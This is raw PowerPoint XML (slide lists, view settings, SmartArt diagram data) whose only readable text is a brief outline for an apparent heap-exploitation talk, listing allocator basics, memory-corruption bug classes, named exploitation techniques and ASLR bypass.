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2"/>
  </p:notesMasterIdLst>
  <p:sldIdLst>
    <p:sldId id="440" r:id="rId2"/>
    <p:sldId id="546" r:id="rId3"/>
    <p:sldId id="547" r:id="rId4"/>
    <p:sldId id="555" r:id="rId5"/>
    <p:sldId id="556" r:id="rId6"/>
    <p:sldId id="557" r:id="rId7"/>
    <p:sldId id="558" r:id="rId8"/>
    <p:sldId id="559" r:id="rId9"/>
    <p:sldId id="560" r:id="rId10"/>
    <p:sldId id="565" r:id="rId11"/>
    <p:sldId id="561" r:id="rId12"/>
    <p:sldId id="562" r:id="rId13"/>
    <p:sldId id="563" r:id="rId14"/>
    <p:sldId id="564" r:id="rId15"/>
    <p:sldId id="566" r:id="rId16"/>
    <p:sldId id="548" r:id="rId17"/>
    <p:sldId id="567" r:id="rId18"/>
    <p:sldId id="569" r:id="rId19"/>
    <p:sldId id="568" r:id="rId20"/>
    <p:sldId id="570" r:id="rId21"/>
    <p:sldId id="550" r:id="rId22"/>
    <p:sldId id="549" r:id="rId23"/>
    <p:sldId id="428" r:id="rId24"/>
    <p:sldId id="572" r:id="rId25"/>
    <p:sldId id="573" r:id="rId26"/>
    <p:sldId id="571" r:id="rId27"/>
    <p:sldId id="551" r:id="rId28"/>
    <p:sldId id="552" r:id="rId29"/>
    <p:sldId id="578" r:id="rId30"/>
    <p:sldId id="579" r:id="rId31"/>
    <p:sldId id="580" r:id="rId32"/>
    <p:sldId id="581" r:id="rId33"/>
    <p:sldId id="582" r:id="rId34"/>
    <p:sldId id="583" r:id="rId35"/>
    <p:sldId id="584" r:id="rId36"/>
    <p:sldId id="585" r:id="rId37"/>
    <p:sldId id="586" r:id="rId38"/>
    <p:sldId id="588" r:id="rId39"/>
    <p:sldId id="575" r:id="rId40"/>
    <p:sldId id="587" r:id="rId41"/>
    <p:sldId id="589" r:id="rId42"/>
    <p:sldId id="590" r:id="rId43"/>
    <p:sldId id="591" r:id="rId44"/>
    <p:sldId id="593" r:id="rId45"/>
    <p:sldId id="592" r:id="rId46"/>
    <p:sldId id="597" r:id="rId47"/>
    <p:sldId id="596" r:id="rId48"/>
    <p:sldId id="446" r:id="rId49"/>
    <p:sldId id="544" r:id="rId50"/>
    <p:sldId id="594" r:id="rId51"/>
    <p:sldId id="600" r:id="rId52"/>
    <p:sldId id="595" r:id="rId53"/>
    <p:sldId id="599" r:id="rId54"/>
    <p:sldId id="598" r:id="rId55"/>
    <p:sldId id="602" r:id="rId56"/>
    <p:sldId id="468" r:id="rId57"/>
    <p:sldId id="469" r:id="rId58"/>
    <p:sldId id="603" r:id="rId59"/>
    <p:sldId id="606" r:id="rId60"/>
    <p:sldId id="601" r:id="rId61"/>
    <p:sldId id="604" r:id="rId62"/>
    <p:sldId id="553" r:id="rId63"/>
    <p:sldId id="605" r:id="rId64"/>
    <p:sldId id="607" r:id="rId65"/>
    <p:sldId id="608" r:id="rId66"/>
    <p:sldId id="610" r:id="rId67"/>
    <p:sldId id="611" r:id="rId68"/>
    <p:sldId id="612" r:id="rId69"/>
    <p:sldId id="613" r:id="rId70"/>
    <p:sldId id="615" r:id="rId71"/>
    <p:sldId id="609" r:id="rId72"/>
    <p:sldId id="618" r:id="rId73"/>
    <p:sldId id="617" r:id="rId74"/>
    <p:sldId id="619" r:id="rId75"/>
    <p:sldId id="620" r:id="rId76"/>
    <p:sldId id="616" r:id="rId77"/>
    <p:sldId id="623" r:id="rId78"/>
    <p:sldId id="621" r:id="rId79"/>
    <p:sldId id="625" r:id="rId80"/>
    <p:sldId id="624" r:id="rId81"/>
    <p:sldId id="626" r:id="rId82"/>
    <p:sldId id="627" r:id="rId83"/>
    <p:sldId id="629" r:id="rId84"/>
    <p:sldId id="631" r:id="rId85"/>
    <p:sldId id="632" r:id="rId86"/>
    <p:sldId id="633" r:id="rId87"/>
    <p:sldId id="636" r:id="rId88"/>
    <p:sldId id="637" r:id="rId89"/>
    <p:sldId id="638" r:id="rId90"/>
    <p:sldId id="472" r:id="rId91"/>
    <p:sldId id="498" r:id="rId92"/>
    <p:sldId id="635" r:id="rId93"/>
    <p:sldId id="630" r:id="rId94"/>
    <p:sldId id="640" r:id="rId95"/>
    <p:sldId id="641" r:id="rId96"/>
    <p:sldId id="652" r:id="rId97"/>
    <p:sldId id="653" r:id="rId98"/>
    <p:sldId id="654" r:id="rId99"/>
    <p:sldId id="655" r:id="rId100"/>
    <p:sldId id="656" r:id="rId101"/>
    <p:sldId id="639" r:id="rId102"/>
    <p:sldId id="642" r:id="rId103"/>
    <p:sldId id="657" r:id="rId104"/>
    <p:sldId id="643" r:id="rId105"/>
    <p:sldId id="658" r:id="rId106"/>
    <p:sldId id="645" r:id="rId107"/>
    <p:sldId id="646" r:id="rId108"/>
    <p:sldId id="647" r:id="rId109"/>
    <p:sldId id="659" r:id="rId110"/>
    <p:sldId id="650" r:id="rId111"/>
    <p:sldId id="651" r:id="rId112"/>
    <p:sldId id="661" r:id="rId113"/>
    <p:sldId id="662" r:id="rId114"/>
    <p:sldId id="648" r:id="rId115"/>
    <p:sldId id="663" r:id="rId116"/>
    <p:sldId id="664" r:id="rId117"/>
    <p:sldId id="665" r:id="rId118"/>
    <p:sldId id="666" r:id="rId119"/>
    <p:sldId id="667" r:id="rId120"/>
    <p:sldId id="668" r:id="rId121"/>
    <p:sldId id="670" r:id="rId122"/>
    <p:sldId id="671" r:id="rId123"/>
    <p:sldId id="672" r:id="rId124"/>
    <p:sldId id="674" r:id="rId125"/>
    <p:sldId id="673" r:id="rId126"/>
    <p:sldId id="675" r:id="rId127"/>
    <p:sldId id="676" r:id="rId128"/>
    <p:sldId id="677" r:id="rId129"/>
    <p:sldId id="678" r:id="rId130"/>
    <p:sldId id="679" r:id="rId1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9" autoAdjust="0"/>
    <p:restoredTop sz="84898" autoAdjust="0"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr snapToGrid="0" snapToObjects="1">
      <p:cViewPr varScale="1">
        <p:scale>
          <a:sx n="144" d="100"/>
          <a:sy n="144" d="100"/>
        </p:scale>
        <p:origin x="47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5C88F0-B491-45D1-9C23-78FF9AF7FA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25326BE-441B-4349-A95E-911D3C8E2D93}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US"/>
            <a:t>Introduction to the Allocator (chunks, bins, etc.) </a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{10ED73AF-A585-442E-9D58-8F69000DFCC4}" type="parTrans" cxnId="{D67B4C9C-D329-40F9-81B2-EC97B3D96713}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{7925A1B5-7010-4BE8-8275-2696DBCCC314}" type="sibTrans" cxnId="{D67B4C9C-D329-40F9-81B2-EC97B3D96713}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{1D004D8C-0090-4855-B961-357563AF4359}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US"/>
            <a:t>Vulnerability Classes (use after free, overflow, double free) </a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{8639C9B4-DED0-45D3-A6C9-5B5ABFE65B52}" type="parTrans" cxnId="{9D9CBA03-AAA6-4837-88CE-81FECADF3C75}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{43EBC6EC-6EC5-4922-940B-62080A7A5382}" type="sibTrans" cxnId="{9D9CBA03-AAA6-4837-88CE-81FECADF3C75}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{A462F534-0C53-4EA9-84CA-34D743DB303F}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US"/>
            <a:t>Techniques (Fd Poison, Unlink, House of Force…) </a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{61CC8F71-D038-483A-B884-0C7848E5B679}" type="parTrans" cxnId="{3F12FF2A-4FFB-4591-910A-DB8E1528DDB9}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{B3F59E0F-8911-480D-8887-B829B421392E}" type="sibTrans" cxnId="{3F12FF2A-4FFB-4591-910A-DB8E1528DDB9}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{3F7E58B4-025F-43FD-92FC-DD63A06AC95C}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US"/>
            <a:t>Information leaks/defeating ASLR</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{C99D157E-8494-456C-AA15-D67D1EB495D0}" type="parTrans" cxnId="{5D824B3D-0912-41AB-B377-EBB68BECA8DD}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{4E302E08-A64F-491D-B4D7-C7D4F4038874}" type="sibTrans" cxnId="{5D824B3D-0912-41AB-B377-EBB68BECA8DD}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{0F364806-75F7-4C3A-8E5B-CDE35F99C8D4}" type="pres">
      <dgm:prSet presAssocID="{6C5C88F0-B491-45D1-9C23-78FF9AF7FA7F}" presName="root" presStyleCnt="0">
        <dgm:presLayoutVars>
          <dgm:dir/>
          <dgm:resizeHandles val="exact"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{C5FD62B9-B4C2-43D8-813C-3967EA94F633}" type="pres">
      <dgm:prSet presAssocID="{A25326BE-441B-4349-A95E-911D3C8E2D93}" presName="compNode" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{D8AF373A-0F92-48E9-8265-301DD8910506}" type="pres">
      <dgm:prSet presAssocID="{A25326BE-441B-4349-A95E-911D3C8E2D93}" presName="bgRect" presStyleLbl="bgShp" presStyleIdx="0" presStyleCnt="4"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{41CB7FAE-D146-49B6-8CC5-08B3C1BA6EF5}" type="pres">
      <dgm:prSet presAssocID="{A25326BE-441B-4349-A95E-911D3C8E2D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BD51E9CC-59EE-4E66-84AF-C71A4BC3621E}" type="pres">
      <dgm:prSet presAssocID="{A25326BE-441B-4349-A95E-911D3C8E2D93}" presName="spaceRect" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{B8D9B8C9-0A2B-40A8-9331-BB40445DC1BA}" type="pres">
      <dgm:prSet presAssocID="{A25326BE-441B-4349-A95E-911D3C8E2D93}" presName="parTx" presStyleLbl="revTx" presStyleIdx="0" presStyleCnt="4">
        <dgm:presLayoutVars>
          <dgm:chMax val="0"/>
          <dgm:chPref val="0"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{1E8A4C1C-86FA-45EA-B499-BE69DDE48759}" type="pres">
      <dgm:prSet presAssocID="{7925A1B5-7010-4BE8-8275-2696DBCCC314}" presName="sibTrans" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{E7031449-73A7-4520-8C92-1040B70825D7}" type="pres">
      <dgm:prSet presAssocID="{1D004D8C-0090-4855-B961-357563AF4359}" presName="compNode" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{CC042912-3B7C-4F7B-99FA-F146F2A6F950}" type="pres">
      <dgm:prSet presAssocID="{1D004D8C-0090-4855-B961-357563AF4359}" presName="bgRect" presStyleLbl="bgShp" presStyleIdx="1" presStyleCnt="4"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{CAC4D5D5-A81A-4F61-9B06-F8B9DDFA427B}" type="pres">
      <dgm:prSet presAssocID="{1D004D8C-0090-4855-B961-357563AF435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4AC411C-2149-444B-8657-037D7A5D82A1}" type="pres">
      <dgm:prSet presAssocID="{1D004D8C-0090-4855-B961-357563AF4359}" presName="spaceRect" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{6B2F8A12-8F7E-473D-A2E0-444A7AF4CFC6}" type="pres">
      <dgm:prSet presAssocID="{1D004D8C-0090-4855-B961-357563AF4359}" presName="parTx" presStyleLbl="revTx" presStyleIdx="1" presStyleCnt="4">
        <dgm:presLayoutVars>
          <dgm:chMax val="0"/>
          <dgm:chPref val="0"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{D07CA04D-16F9-416E-9908-B5768D93D188}" type="pres">
      <dgm:prSet presAssocID="{43EBC6EC-6EC5-4922-940B-62080A7A5382}" presName="sibTrans" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{FE098F07-D610-4E16-81DD-2D24D11A3302}" type="pres">
      <dgm:prSet presAssocID="{A462F534-0C53-4EA9-84CA-34D743DB303F}" presName="compNode" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{04E8DDB2-D5FD-4759-8AF7-4622C55AF0D5}" type="pres">
      <dgm:prSet presAssocID="{A462F534-0C53-4EA9-84CA-34D743DB303F}" presName="bgRect" presStyleLbl="bgShp" presStyleIdx="2" presStyleCnt="4"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{EEA38D49-E286-4FA3-99E5-2F2340A10930}" type="pres">
      <dgm:prSet presAssocID="{A462F534-0C53-4EA9-84CA-34D743DB303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36531050-D517-4A2A-9BC7-35D4526BED6F}" type="pres">
      <dgm:prSet presAssocID="{A462F534-0C53-4EA9-84CA-34D743DB303F}" presName="spaceRect" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{D0FFF0D1-4A23-418F-A282-3117EA1DC2F7}" type="pres">
      <dgm:prSet presAssocID="{A462F534-0C53-4EA9-84CA-34D743DB303F}" presName="parTx" presStyleLbl="revTx" presStyleIdx="2" presStyleCnt="4">
        <dgm:presLayoutVars>
          <dgm:chMax val="0"/>
          <dgm:chPref val="0"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{5A931A70-AA91-4BA6-98F8-ACC82FBA7674}" type="pres">
      <dgm:prSet presAssocID="{B3F59E0F-8911-480D-8887-B829B421392E}" presName="sibTrans" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{74182234-963B-4AEA-BB43-F97C7C58C10F}" type="pres">
      <dgm:prSet presAssocID="{3F7E58B4-025F-43FD-92FC-DD63A06AC95C}" presName="compNode" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{AC42A769-9035-43C8-86E3-07B01B6EBD8E}" type="pres">
      <dgm:prSet presAssocID="{3F7E58B4-025F-43FD-92FC-DD63A06AC95C}" presName="bgRect" presStyleLbl="bgShp" presStyleIdx="3" presStyleCnt="4"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{D4D55A12-10BB-4371-8F01-164DAD6D4F79}" type="pres">
      <dgm:prSet presAssocID="{3F7E58B4-025F-43FD-92FC-DD63A06AC95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8B9555E3-DEFA-451F-8CCE-ABAD05A9DE06}" type="pres">
      <dgm:prSet presAssocID="{3F7E58B4-025F-43FD-92FC-DD63A06AC95C}" presName="spaceRect" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{A4C8257E-F815-46A4-8A00-25C28B2F807B}" type="pres">
      <dgm:prSet presAssocID="{3F7E58B4-025F-43FD-92FC-DD63A06AC95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D9CBA03-AAA6-4837-88CE-81FECADF3C75}" srcId="{6C5C88F0-B491-45D1-9C23-78FF9AF7FA7F}" destId="{1D004D8C-0090-4855-B961-357563AF4359}" srcOrd="1" destOrd="0" parTransId="{8639C9B4-DED0-45D3-A6C9-5B5ABFE65B52}" sibTransId="{43EBC6EC-6EC5-4922-940B-62080A7A5382}"/>
    <dgm:cxn modelId="{3F12FF2A-4FFB-4591-910A-DB8E1528DDB9}" srcId="{6C5C88F0-B491-45D1-9C23-78FF9AF7FA7F}" destId="{A462F534-0C53-4EA9-84CA-34D743DB303F}" srcOrd="2" destOrd="0" parTransId="{61CC8F71-D038-483A-B884-0C7848E5B679}" sibTransId="{B3F59E0F-8911-480D-8887-B829B421392E}"/>
    <dgm:cxn modelId="{D1D61034-008C-49E1-B3BD-3BF9EBBF452F}" type="presOf" srcId="{3F7E58B4-025F-43FD-92FC-DD63A06AC95C}" destId="{A4C8257E-F815-46A4-8A00-25C28B2F807B}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconVerticalSolidList"/>
    <dgm:cxn modelId="{BA700439-D1AE-425A-AFD5-2EB612B86BBD}" type="presOf" srcId="{A25326BE-441B-4349-A95E-911D3C8E2D93}" destId="{B8D9B8C9-0A2B-40A8-9331-BB40445DC1BA}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconVerticalSolidList"/>
    <dgm:cxn modelId="{5D824B3D-0912-41AB-B377-EBB68BECA8DD}" srcId="{6C5C88F0-B491-45D1-9C23-78FF9AF7FA7F}" destId="{3F7E58B4-025F-43FD-92FC-DD63A06AC95C}" srcOrd="3" destOrd="0" parTransId="{C99D157E-8494-456C-AA15-D67D1EB495D0}" sibTransId="{4E302E08-A64F-491D-B4D7-C7D4F4038874}"/>
    <dgm:cxn modelId="{D6DE653E-6CF2-49D3-89D5-00DA83774ADF}" type="presOf" srcId="{1D004D8C-0090-4855-B961-357563AF4359}" destId="{6B2F8A12-8F7E-473D-A2E0-444A7AF4CFC6}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconVerticalSolidList"/>
    <dgm:cxn modelId="{D67B4C9C-D329-40F9-81B2-EC97B3D96713}" srcId="{6C5C88F0-B491-45D1-9C23-78FF9AF7FA7F}" destId="{A25326BE-441B-4349-A95E-911D3C8E2D93}" srcOrd="0" destOrd="0" parTransId="{10ED73AF-A585-442E-9D58-8F69000DFCC4}" sibTransId="{7925A1B5-7010-4BE8-8275-2696DBCCC314}"/>
    <dgm:cxn modelId="{ED089FB7-C33D-4800-91A7-BFB87A6ACA7D}" type="presOf" srcId="{A462F534-0C53-4EA9-84CA-34D743DB303F}" destId="{D0FFF0D1-4A23-418F-A282-3117EA1DC2F7}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconVerticalSolidList"/>
    <dgm:cxn modelId="{3702B1C9-D714-448C-A93F-56AD8D39AC5A}" type="presOf" srcId="{6C5C88F0-B491-45D1-9C23-78FF9AF7FA7F}" destId="{0F364806-75F7-4C3A-8E5B-CDE35F99C8D4}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconVerticalSolidList"/>
    <dgm:cxn modelId="{D6F7FFF9-9488-4133-ADB6-69FEE52B659D}" type="presParOf" srcId="{0F364806-75F7-4C3A-8E5B-CDE35F99C8D4}" destId="{C5FD62B9-B4C2-43D8-813C-3967EA94F633}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconVerticalSolidList"/>
    <dgm:cxn modelId="{77229190-CC1F-4070-8252-B75DEB404BEE}" type="presParOf" srcId="{C5FD62B9-B4C2-43D8-813C-3967EA94F633}" destId="{D8AF373A-0F92-48E9-8265-301DD8910506}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconVerticalSolidList"/>
    <dgm:cxn modelId="{42876ACE-0821-431E-91BB-76A0922C11BC}" type="presParOf" srcId="{C5FD62B9-B4C2-43D8-813C-3967EA94F633}" destId="{41CB7FAE-D146-49B6-8CC5-08B3C1BA6EF5}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconVerticalSolidList"/>
    <dgm:cxn modelId="{17B3D4BE-42A3-4316-9A9B-06D1B1101A8F}" type="presParOf" srcId="{C5FD62B9-B4C2-43D8-813C-3967EA94F633}" destId="{BD51E9CC-59EE-4E66-84AF-C71A4BC3621E}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconVerticalSolidList"/>
    <dgm:cxn modelId="{FCC48855-A08A-4083-9797-857FF8114588}" type="presParOf" srcId="{C5FD62B9-B4C2-43D8-813C-3967EA94F633}" destId="{B8D9B8C9-0A2B-40A8-9331-BB40445DC1BA}" srcOrd="3" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconVerticalSolidList"/>
    <dgm:cxn modelId="{D940949F-E89B-4AB6-A63E-A6C3185B95B3}" type="presParOf" srcId="{0F364806-75F7-4C3A-8E5B-CDE35F99C8D4}" destId="{1E8A4C1C-86FA-45EA-B499-BE69DDE48759}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconVerticalSolidList"/>
    <dgm:cxn modelId="{41B71D58-AE82-4400-BD34-8AA260D8B076}" type="presParOf" srcId="{0F364806-75F7-4C3A-8E5B-CDE35F99C8D4}" destId="{E7031449-73A7-4520-8C92-1040B70825D7}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconVerticalSolidList"/>
    <dgm:cxn modelId="{F75E4496-6C10-42CA-BCE2-05152029A1E5}" type="presParOf" srcId="{E7031449-73A7-4520-8C92-1040B70825D7}" destId="{CC042912-3B7C-4F7B-99FA-F146F2A6F950}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconVerticalSolidList"/>
    <dgm:cxn modelId="{BF0791D8-1A4F-45D6-A9B5-F495579E150E}" type="presParOf" srcId="{E7031449-73A7-4520-8C92-1040B70825D7}" destId="{CAC4D5D5-A81A-4F61-9B06-F8B9DDFA427B}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconVerticalSolidList"/>
    <dgm:cxn modelId="{21A11D41-16BE-4808-8D68-C0B45759A952}" type="presParOf" srcId="{E7031449-73A7-4520-8C92-1040B70825D7}" destId="{14AC411C-2149-444B-8657-037D7A5D82A1}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconVerticalSolidList"/>
    <dgm:cxn modelId="{677488E4-EA6D-4960-A5B3-CD7E8A0F6F52}" type="presParOf" srcId="{E7031449-73A7-4520-8C92-1040B70825D7}" destId="{6B2F8A12-8F7E-473D-A2E0-444A7AF4CFC6}" srcOrd="3" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconVerticalSolidList"/>
    <dgm:cxn modelId="{94E9BF22-0C1D-4A8B-9714-E74D023A40E2}" type="presParOf" srcId="{0F364806-75F7-4C3A-8E5B-CDE35F99C8D4}" destId="{D07CA04D-16F9-416E-9908-B5768D93D188}" srcOrd="3" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconVerticalSolidList"/>
    <dgm:cxn modelId="{0DAE4364-EA37-477C-8C5E-0C72AF011043}" type="presParOf" srcId="{0F364806-75F7-4C3A-8E5B-CDE35F99C8D4}" destId="{FE098F07-D610-4E16-81DD-2D24D11A3302}" srcOrd="4" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconVerticalSolidList"/>
    <dgm:cxn modelId="{1BF36701-C662-4A68-96FD-F115324581F8}" type="presParOf" srcId="{FE098F07-D610-4E16-81DD-2D24D11A3302}" destId="{04E8DDB2-D5FD-4759-8AF7-4622C55AF0D5}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconVerticalSolidList"/>
    <dgm:cxn modelId="{FF52E023-A159-48C8-9E3F-B45D345D9929}" type="presParOf" srcId="{FE098F07-D610-4E16-81DD-2D24D11A3302}" destId="{EEA38D49-E286-4FA3-99E5-2F2340A10930}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconVerticalSolidList"/>
    <dgm:cxn modelId="{C502704A-6D37-48D4-A6BF-19E7079AE994}" type="presParOf" srcId="{FE098F07-D610-4E16-81DD-2D24D11A3302}" destId="{36531050-D517-4A2A-9BC7-35D4526BED6F}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconVerticalSolidList"/>
    <dgm:cxn modelId="{12990C0B-499B-4F3F-AF3B-57BE9E7183A5}" type="presParOf" srcId="{FE098F07-D610-4E16-81DD-2D24D11A3302}" destId="{D0FFF0D1-4A23-418F-A282-3117EA1DC2F7}" srcOrd="3" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconVerticalSolidList"/>
    <dgm:cxn modelId="{E2E6BE46-B5B6-41BD-BF23-AD87D8B1FE3D}" type="presParOf" srcId="{0F364806-75F7-4C3A-8E5B-CDE35F99C8D4}" destId="{5A931A70-AA91-4BA6-98F8-ACC82FBA7674}" srcOrd="5" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconVerticalSolidList"/>
    <dgm:cxn modelId="{181A0D36-F8F3-4CA2-87DE-8A76281B0E20}" type="presParOf" srcId="{0F364806-75F7-4C3A-8E5B-CDE35F99C8D4}" destId="{74182234-963B-4AEA-BB43-F97C7C58C10F}" srcOrd="6" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconVerticalSolidList"/>
    <dgm:cxn modelId="{E0DF649D-DB8D-4990-B75A-C1247D599CC2}" type="presParOf" srcId="{74182234-963B-4AEA-BB43-F97C7C58C10F}" destId="{AC42A769-9035-43C8-86E3-07B01B6EBD8E}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconVerticalSolidList"/>
    <dgm:cxn modelId="{ACAD8172-59BD-49E7-B03A-CC967AB4FDC6}" type="presParOf" srcId="{74182234-963B-4AEA-BB43-F97C7C58C10F}" destId="{D4D55A12-10BB-4371-8F01-164DAD6D4F79}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconVerticalSolidList"/>
    <dgm:cxn modelId="{FAEEF495-E5C8-4C64-AF35-17C34E2EC94F}" type="presParOf" srcId="{74182234-963B-4AEA-BB43-F97C7C58C10F}" destId="{8B9555E3-DEFA-451F-8CCE-ABAD05A9DE06}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconVerticalSolidList"/>
    <dgm:cxn modelId="{6794A70E-9687-4E04-A83D-13F6FE1C3C13}" type="presParOf" srcId="{74182234-963B-4AEA-BB43-F97C7C58C10F}" destId="{A4C8257E-F815-46A4-8A00-25C28B2F80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71E764-3E85-4DE3-AF28-041D472AB4A5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5E3E326-4479-453A-9863-465A1E47F809}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" dirty="0"/>
            <a:t>Discovery</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{E0F38ABF-175E-4946-97EC-62E269264AEB}" type="parTrans" cxnId="{9E329856-96C5-4B23-88B3-D04215704C20}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{057165DE-592C-4C48-9E8B-4A0E165849AC}" type="sibTrans" cxnId="{9E329856-96C5-4B23-88B3-D04215704C20}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{A9AA3363-A0CF-4581-838E-44D10A1636B4}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
